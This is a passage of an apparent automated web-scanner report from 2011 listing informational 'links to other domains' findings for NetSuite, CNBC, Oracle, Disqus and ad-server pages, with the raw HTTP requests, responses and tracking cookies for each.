<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/financials/financial-management.shtml' title='.../portal/products/netsuite/financials/financial-management.shtml' baynote_bnrank='1' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>NetSuite Financial Management</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/analytics/main.shtml' title='http://www.netsuite.com/portal/products/netsuite/analytics/main.shtml' baynote_bnrank='2' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Financial Analytics</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/financial-planning/main.shtml' title='.../portal/products/netsuite/financial-planning/main.shtml' baynote_bnrank='3' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Financial Planning</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/revenue-recognition/main.shtml' title='.../portal/products/netsuite/revenue-recognition/main.shtml' baynote_bnrank='4' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Revenue Recognition Management- NetSuite</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/main.shtml' title='http://www.netsuite.com/portal/products/netsuite/main.shtml' baynote_bnrank='5' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>NetSuite Solution Overview</a>
...[SNIP]...

19.55. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netsuite-www.baynote.net
Path:	/baynote/tags2/guide/results-products/netsuite-www

Issue detail

The page was loaded from a URL containing a query string:

http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www?userId=6923713758307492964&customerId=netsuite&code=www&id=0&guide=ContentGuide&resultsPerPage=5&referrer=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml&url=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Frevenue%2Fmain.shtml&appendParams=&rankParam=&condition=d%26g%26s&v=1

The response contains the following links to other domains:

http://www.netsuite.com/portal/management.shtml
http://www.netsuite.com/portal/products/netsuite/analytics/main.shtml
http://www.netsuite.com/portal/products/netsuite/financials/financial-management.shtml
http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
http://www.netsuite.com/portal/products/netsuite/revenue-recognition/main.shtml

Request

GET /baynote/tags2/guide/results-products/netsuite-www?userId=6923713758307492964&customerId=netsuite&code=www&id=0&guide=ContentGuide&resultsPerPage=5&referrer=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml&url=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Frevenue%2Fmain.shtml&appendParams=&rankParam=&condition=d%26g%26s&v=1 HTTP/1.1
Host: netsuite-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/revenue/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:44:22 GMT
Content-Length: 3621

bnTagManager.getTag(0).results = "<div class='bn_g_container' id='bn_guidecontainer0'><div class='bn_g_area' id='bn_guidearea0'><div class='bn_g_welcome' id='bn_guidewelcome0
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/revenue-recognition/main.shtml' title='.../portal/products/netsuite/revenue-recognition/main.shtml' baynote_bnrank='1' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Revenue Recognition Management- NetSuite</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/analytics/main.shtml' title='http://www.netsuite.com/portal/products/netsuite/analytics/main.shtml' baynote_bnrank='2' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Financial Analytics</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/financials/main.shtml' title='http://www.netsuite.com/portal/products/netsuite/financials/main.shtml' baynote_bnrank='3' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>NetSuite Financials</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/management.shtml' title='http://www.netsuite.com/portal/management.shtml' baynote_bnrank='4' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Management Team</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/financials/financial-management.shtml' title='.../portal/products/netsuite/financials/financial-management.shtml' baynote_bnrank='5' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>NetSuite Financial Management</a>
...[SNIP]...

19.56. http://optimized-by.rubiconproject.com/a/dk.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250

The response contains the following links to other domains:

http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=Television,NewsAndReference
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

19.57. https://oracleus.wingateweb.com/portal/newreg.ww previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://oracleus.wingateweb.com
Path:	/portal/newreg.ww

Issue detail

The page was loaded from a URL containing a query string:

https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=ow

The response contains the following link to another domain:

https://102.112.2o7.net/b/ss/winweboracle/1/H.14--NS/0

Request

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:54:14 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Connection: Keep-Alive
Content-Length: 11209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="expir
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.112.2O7.net/b/ss/winweboracle/1/H.14--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

19.58. http://readwriteenterprise.disqus.com/combination_widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://readwriteenterprise.disqus.com
Path:	/combination_widget.js

Issue detail

The page was loaded from a URL containing a query string:

http://readwriteenterprise.disqus.com/combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=people&excerpt_length=200

The response contains the following links to other domains:

http://www.readwriteweb.com/enterprise/2011/08/as-steve-jobs-steps-down-linux.php
http://www.readwriteweb.com/enterprise/2011/09/gartner-says-1b-market-for-soc.php
http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php
http://www.readwriteweb.com/enterprise/2011/09/take-network-worlds-browser-te.php
http://www.readwriteweb.com/enterprise/2011/09/the-next-internet-whats-holdin.php

Request

GET /combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=people&excerpt_length=200 HTTP/1.1
Host: readwriteenterprise.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315100729.1315138435.4; __utmz=113869458.1315138435.4.4.utmcsr=scmagazine.com.au|utmccn=(referral)|utmcmd=referral|utmcct=/News/268907,kaspersky-website-vulnerable-to-xss.aspx

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Content-Length: 13329
Date: Tue, 06 Sep 2011 15:32:46 GMT
X-Varnish: 1225738715 1225689879
Age: 47
Via: 1.1 varnish
Connection: close

function dsqComboTab(tab) {
   document.getElementById('dsq-combo-people').style.display = "none";
   document.getElementById('dsq-combo-popular').style.display = "none";
   document.getElementById('dsq-
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.readwriteweb.com/enterprise/2011/09/gartner-says-1b-market-for-soc.php">Gartner Says \\$1B Market for Social CRM by 2013</a> · <a href="http://www.readwriteweb.com/enterprise/2011/09/gartner-says-1b-market-for-soc.php#comment-303517617">1 hour ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.readwriteweb.com/enterprise/2011/09/the-next-internet-whats-holdin.php">The Next Internet: What's Holding Us Back?</a> · <a href="http://www.readwriteweb.com/enterprise/2011/09/the-next-internet-whats-holdin.php#comment-303496799">2 hours ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php">Slow Down, Rather Than Ban Student Facebook Access</a> · <a href="http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php#comment-303398752">7 hours ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php">Slow Down, Rather Than Ban Student Facebook Access</a> · <a href="http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php#comment-303039905">21 hours ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.readwriteweb.com/enterprise/2011/09/take-network-worlds-browser-te.php">Take Network World's Browser Test</a> · <a href="http://www.readwriteweb.com/enterprise/2011/09/take-network-worlds-browser-te.php#comment-303006867">22 hours ago</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.readwriteweb.com/enterprise/2011/09/the-next-internet-whats-holdin.php">The Next Internet: What's Holding Us Back?</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.readwriteweb.com/enterprise/2011/09/slow-down-rather-than-ban-stud.php">Slow Down, Rather Than Ban Student Facebook Access</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.readwriteweb.com/enterprise/2011/08/as-steve-jobs-steps-down-linux.php">As Steve Jobs Steps Down, Linux Turns 20: Which Changed the World More?</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.readwriteweb.com/enterprise/2011/09/gartner-says-1b-market-for-soc.php">Gartner Says \\$1B Market for Social CRM by 2013</a>
...[SNIP]...
<li class="dsq-clearfix">\
    <a class="dsq-widget-thread" href="http://www.readwriteweb.com/enterprise/2011/09/take-network-worlds-browser-te.php">Take Network World's Browser Test</a>
...[SNIP]...

19.59. http://search.cnbc.com/main.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/main.do

Issue detail

The page was loaded from a URL containing a query string:

http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://ads1.msn.com/library/dap.js?rti=200914
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js
http://www.nbcuniversalstore.com/?v=cnbc
http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions

Request

POST /main.do?target=all&keywords=xss&categories=exclude HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Content-Length: 18
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

searchboxinput=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 aicache6
Content-Length: 84619
X-Aicache-OS: 64.210.194.248:80
Connection: Keep-Alive
Keep-Alive: max=20

<html>
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/id/29755670">
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js?rti=200914"></script>
...[SNIP]...

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
<div style="height:1px; line-height:1px;">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="1" height="1" id="flashQuoteProxy" align="middle">
<param name="allowScriptAccess" value="always">
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div pcid="0" style="padding-bottom:px;"><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions">DVDs</a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/?v=cnbc">Merchandise</a>
...[SNIP]...

<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

19.60. http://search.oracle.com/search/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.oracle.com
Path:	/search/search

Issue detail

The page was loaded from a URL containing a query string:

http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search

The response contains the following link to another domain:

http://dev.mysql.com/news-and-events/newsletter/2008/2008-12.html

Request

GET /search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search HTTP/1.1
Host: search.oracle.com
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?default=true&keyword=phone&start=1&nodeid=&fid=&showSimilarDoc=true&group=All
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d920c7f1e6cd9839230afb44aa089e4c8ac2d20e3ca; ses.qapp.sg_tab_name=All; BIGipServerses_ext_prod_pool=2131530381.30494.0000; s_cc=true; s_nr=1315342484651; gpv_p24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll; gpw_e24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253DSearch%25253A%252520All%25253A%252520Query%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT%26oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (TN;ecid=105646725015,0)
Content-Length: 57009
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:47 GMT
Connection: close
Set-Cookie: JSESSIONID=94577a1c1e6cbc3ca73079c24bb4a5b6833c56849462; path=/search
Set-Cookie: ses.qapp.sg_tab_name=All; HttpOnly

...[SNIP]...
<span class="title"><a href="http://dev.mysql.com/news-and-events/newsletter/2008/2008-12.html" target="_blank">MySQL :: MySQL Newsletter December 2008</a>
...[SNIP]...

19.61. http://serve.directdigitalllc.com/serve.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://serve.directdigitalllc.com
Path:	/serve.php

Issue detail

The page was loaded from a URL containing a query string:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=

The response contains the following links to other domains:

http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/58k58g8oxm.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg
http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C104%2C75&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C104%2C75&t=11
http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=125%2C104%2C75&t=11

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342934886&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 16:02:18 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9400

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C104%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C104%2C75&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=125%2C104%2C75&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C104%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/58k58g8oxm.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C104%2C75&t=11">1 Secret To Joint Relief</a></span>
<a onclick="javascript:trackClick(104, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=104&b=26&p=125%2C104%2C75&t=11">This ridiculously easy way to relieve joints will leave you amazed... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=41330653=_4e664409,0318423006,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=41330653/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=125%2C104%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
